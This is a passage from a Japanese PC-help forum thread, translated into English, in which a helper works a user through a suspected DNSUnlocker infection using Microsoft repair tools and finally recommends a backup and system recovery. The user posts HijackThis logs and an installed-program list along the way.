O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: @%SystemRoot%\servicing\TrustedInstaller.exe,-100 (TrustedInstaller) - Unknown owner - C:\Windows\servicing\TrustedInstaller.exe (file missing)
O23 - Service: Intel(R) Turbo Boost Technology Monitor 2.5 (TurboBoost) - Intel(R) Corporation - C:\Program Files\Intel\TurboBoost\TurboBoost.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: Broadcom Wireless LAN Tray Service (wltrysvc) - Broadcom Corporation - C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\WLTRYSVC.EXE
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 11344 bytes
  • あすとろ
  • 2015/10/12 (Mon) 01:14:44
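Shall we try Microsoft's repair tool?
Good evening.
I am late again today.
Before I knew it, I had become the admin with the fewest answers on this site.
I think I will do some cleaning in the corners, as an admin should.
But I cannot carelessly start cleaning my own room, because I am scared of what might come out (<- your room is the biggest pandemonium of all)

>The download itself works, but when I try to install, a popup appears saying "Go online and install the required programs, then return to the Internet Explorer installation page and run setup again," and I cannot install.

I see, so IE11 can be downloaded but cannot be installed.
It really is a strange symptom.

Then could you try Microsoft's repair tool?

Download the repair tool "Fix it" from the page below, then run it.
http://windows.microsoft.com/ja-JP/windows/troubleshoot-problems-installing-updates#1TC=windows-7

This Fix it scans for various Windows problems and repairs them.
However, there are many problems that it cannot resolve, and in that case, regardless of whether there is an infection, the safe course is to perform a recovery for the sake of stable operation of the PC from now on.
IE is one of the core programs of Windows, and if it cannot be updated and remains vulnerable, the risk of infection also jumps.

First, after running the tool above, try updating IE again and reply with the result.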
  • 悪代官
  • 2015/10/12 (Mon) 21:08:59
Re: DNSunlocker infection
I tried it, but the update still does not work. I think I wrote this before, but it shows error code: 80070002.
  • あすとろ
  • 2015/10/14 (Wed) 02:14:34
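Shall we also try deleting the update files manually?
Sorry for the late reply again tonight.

>I tried it, but the update still does not work. I think I wrote this before, but it shows error code: 80070002.

Hmm, in that case we will probably end up trying the manual procedure described on the Microsoft site, though the chances of success are probably slim.
Shall we try it anyway, using the page below as a reference?
http://windows.microsoft.com/ja-jp/windows/windows-update-error-80070002#1TC=windows-7

There, following the steps under "To delete the temporary update files", find the SoftwareDistribution folder, delete the files in it, then retry the update and reply with the result.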
  • 悪代官
  • 2015/10/14 (Wed) 21:04:29
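Re: DNSunlocker infection
>Shall we try it anyway, using the page below as a reference?
>http://windows.microsoft.com/ja-jp/windows/windows-update-error-80070002#1TC=windows-7
>
>There, following the steps under "To delete the temporary update files", find the SoftwareDistribution folder, delete the files in it, then retry the update and reply with the result.


I tried it, but it had no effect. I am also trying the standalone install mentioned further down at the URL above, but the bar does not move and I cannot tell whether it is succeeding or failing.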
  • あすとろ
  • 2015/10/16 (Fri) 02:40:11
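Late again tonight
My reply is late again tonight.

It seems the abnormality continues even after the cleanup.
I am truly sorry that, after putting you to so much trouble, there has been no improvement.

>I tried it, but it had no effect. I am also trying the standalone install mentioned further down at the URL above, but the bar does not move and I cannot tell whether it is succeeding or failing.

Then, sorry for the trouble, but could you take just the HJT log again and show it to me?
I will review it again, including whether or not the update has gone through.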
  • 悪代官
  • 2015/10/16 (Fri) 21:27:47
Re: DNSunlocker infection
I am the one who should apologize for the late reply. Could this be the effect of the virus...?

Anyway, I will paste the log.


Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 2:11:23, on 2015/10/18
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v9.00 (9.00.8112.16659)

FIREFOX: 41.0.1 (x86 ja)
Boot mode: Normal

Running processes:
C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe
C:\Program Files (x86)\Launch Manager\LManager.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaConverter.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaRenderer.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Program Files (x86)\Janetter2\bin\janettersrv.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Users\【ユーザー名】\Downloads\HijackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe
O1 - Hosts: 127.0.0.1 localhost
O1 - Hosts: ::1 localhost
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll
O4 - HKLM\..\Run: [SuiteTray] "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"
O4 - HKLM\..\Run: [BackupManagerTray] "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
O4 - HKLM\..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKCU\..\Run: [Dropbox Update] "C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe" /c
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKUS\S-1-5-18\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'Default user')
O4 - Startup: Dropbox.lnk = 【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O17 - HKLM\System\CCS\Services\Tcpip\..\{C678E09F-B902-4D1E-87D2-AE9B8DCDE689}: NameServer = 192.168.50.1
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Bonjour サービス (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Chrome リモート デスクトップ サービス (chromoting) - Google Inc. - C:\Program Files (x86)\Google\Chrome Remote Desktop\46.0.2490.13\remoting_host.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: DisplayLinkManager (DisplayLinkService) - DisplayLink Corp. - C:\Program Files\DisplayLink Core Software\DisplayLinkManager.exe
O23 - Service: Dritek WMI Service (DsiWMIService) - Dritek System Inc. - C:\Program Files (x86)\Launch Manager\dsiwmis.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: EgisTec Ticket Service - Egis Technology Inc. - C:\Program Files (x86)\Common Files\EgisTec\Services\EgisTicketService.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: @C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe,-100 (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: GREGService - Acer Incorporated - C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: LogMeIn Hamachi Tunneling Engine (Hamachi2Svc) - LogMeIn Inc. - C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
O23 - Service: Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Live Updater Service - Acer Incorporated - C:\Program Files\Acer\Acer Updater\UpdaterService.exe
O23 - Service: LMIGuardianSvc - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: McAfee McShield (McShield) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe
O23 - Service: McAfee Firewall Core Service (mfefire) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe
O23 - Service: McAfee Validation Trust Protection Service (mfevtp) - Unknown owner - C:\Windows\system32\mfevtps.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Norton Online Backup (NOBU) - Symantec Corporation - C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
O23 - Service: NTI IScheduleSvc - NTI Corporation - C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
O23 - Service: Origin Client Service - Electronic Arts - C:\Program Files (x86)\Origin\OriginClientService.exe
O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: @%SystemRoot%\servicing\TrustedInstaller.exe,-100 (TrustedInstaller) - Unknown owner - C:\Windows\servicing\TrustedInstaller.exe (file missing)
O23 - Service: Intel(R) Turbo Boost Technology Monitor 2.5 (TurboBoost) - Intel(R) Corporation - C:\Program Files\Intel\TurboBoost\TurboBoost.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: Broadcom Wireless LAN Tray Service (wltrysvc) - Broadcom Corporation - C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\WLTRYSVC.EXE
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 11500 bytes
  • あすとろ
  • 2015/10/18 (Sun) 02:24:28
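We should avoid spending any more time on this
Good evening.
Sorry my reply is late again tonight.

I looked at the HJT log, and it seems the updates still could not be applied after all.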
>Platform: Windows 7 SP1 (WinNT 6.00.3505)
>MSIE: Internet Explorer v9.00 (9.00.8112.16659)

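It may be best to avoid wasting any more time.
There is also the P2P use you honestly reported at the start, and if a serious infection is still hidden, taking more time carelessly could widen the damage in the meantime.

Unfortunately, I recommend running a recovery promptly once you have backed up the data you need.

After the recovery, once you have updated Windows, the security software and so on to the latest versions, could you take fresh CC and HJT logs at that point and show them to me?

Even if the abnormal symptoms are no longer visible, continuing to use a system on which Windows and IE, which is one of its core programs, cannot be updated normally is nothing but dangerous.
It may be Windows system corruption rather than an infection, but even so, doubts certainly remain about stable use of the PC.
Putting safety first, recovery is the recommendation, so please start with backing up your data.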
  • 悪代官
  • 2015/10/18 (Sun) 21:01:03
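Re: DNSunlocker infection
So recovery really is the only option, I suppose... However, right now I do not have any storage media with enough capacity to hold the backup data I need, so it will take a little time.

I will try to get one as soon as possible and start the work.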
  • あすとろ
  • 2015/10/20 (Tue) 00:17:37
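Re: DNSunlocker infection
It has been a while. I was planning to borrow an external HDD from an acquaintance, but our schedules did not line up and the work was delayed.

Partly because I was slacking off on the work, my report is late. I am sorry.


The backup went fine and the recovery is complete, so I am posting the logs.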


hjt------------------------------

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 5:12:19, on 2015/11/06
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v9.00 (9.00.8112.16421)


Boot mode: Normal

Running processes:
C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe
C:\Program Files (x86)\Launch Manager\LManager.exe
C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe
C:\Users\【ユーザー名】\Desktop\HijackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Windows Live ID サインイン ヘルパー - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [SuiteTray] "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"
O4 - HKLM\..\Run: [Norton Online Backup] C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [BackupManagerTray] "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
O4 - HKLM\..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe
O4 - HKUS\S-1-5-18\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'Default user')
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: CypherGuard cguard Service 32bit Edition - CypherTec Inc. - C:\Program Files (x86)\Common Files\CypherTec\cgrdsrv32.exe
O23 - Service: CypherGuard cguard Service 64bit Edition - CypherTec Inc. - C:\Program Files\Common Files\CypherTec\cgrdsrv64.exe
O23 - Service: CypherGuard Info Service - CypherTec Inc. - C:\Program Files\Common Files\CypherTec\cthwsrv64.exe
O23 - Service: Dritek WMI Service (DsiWMIService) - Dritek System Inc. - C:\Program Files (x86)\Launch Manager\dsiwmis.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: EgisTec Ticket Service - Egis Technology Inc. - C:\Program Files (x86)\Common Files\EgisTec\Services\EgisTicketService.exe
O23 - Service: ePower Service (ePowerSvc) - Acer Incorporated - C:\Program Files\Acer\Acer ePower Management\ePowerSvc.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: GREGService - Acer Incorporated - C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Live Updater Service - Acer Incorporated - C:\Program Files\Acer\Acer Updater\UpdaterService.exe
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Norton Online Backup (NOBU) - Symantec Corporation - C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
O23 - Service: NTI IScheduleSvc - NTI Corporation - C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Intel(R) Turbo Boost Technology Monitor 2.5 (TurboBoost) - Intel(R) Corporation - C:\Program Files\Intel\TurboBoost\TurboBoost.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: Broadcom Wireless LAN Tray Service (wltrysvc) - Broadcom Corporation - C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\WLTRYSVC.EXE
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 8265 bytes


cc install info -------------------------

Acer Backup Manager NTI Corporation 2012/06/20 337 MB 3.0.0.100
Acer Crystal Eye Webcam CyberLink Corp. 2015/11/06 41.3 MB 1.5.2108.00
Acer ePower Management Acer Incorporated 2015/11/06 6.00.3010
Acer eRecovery Management Acer Incorporated 2012/06/20 5.00.3508
Acer Registration Acer Incorporated 2015/11/06 1.04.3507
Acer ScreenSaver Acer Incorporated 2015/11/06 20.11.1107.1418
Acer Updater Acer Incorporated 2012/06/20 1.02.3501
Adobe Flash Player 11 ActiveX 64-bit Adobe Systems Incorporated 2015/11/06 6.00 MB 11.2.202.235
Adobe Reader X (10.1.0) MUI Adobe Systems Incorporated 2012/06/20 477 MB 10.1.0
BookLive!Reader BookLive 2012/06/20 87.2 MB 1.8.10
Broadcom Card Reader Driver Installer Broadcom Corporation 2015/11/06 2.76 MB 15.0.7.3
Broadcom NetLink Controller Broadcom Corporation 2012/06/20 524 KB 15.0.7.1
Broadcom Wireless Utility Broadcom Corporation 2015/11/06 5.100.82.120
CCleaner Piriform 2015/11/06 5.11
clear.fi Media Acer Incorporated 2015/11/06 2.00.3006
clear.fi Media Acer Incorporated 2015/11/06 2.00.3006
clear.fi Photo Acer Incorporated 2015/11/06 2.00.3006
clear.fi Photo Acer Incorporated 2015/11/06 2.00.3006
CyberLink MediaEspresso CyberLink Corp. 2012/06/20 166 MB 6.5.2727_43992
ETDWare PS/2-X64 10.6.9.9_WHQL ELAN Microelectronic Corp. 2015/11/06 10.6.9.9
Google Chrome Google Inc. 2015/11/06 48.0.2552.0
Identity Card Acer Incorporated 2015/11/06 1.00.3501
Intel(R) Control Center Intel Corporation 2015/11/06 1.2.1.1007
Intel(R) Management Engine Components Intel Corporation 2015/11/06 8.0.2.1410
Intel(R) OpenCL CPU Runtime Intel Corporation 2015/11/06
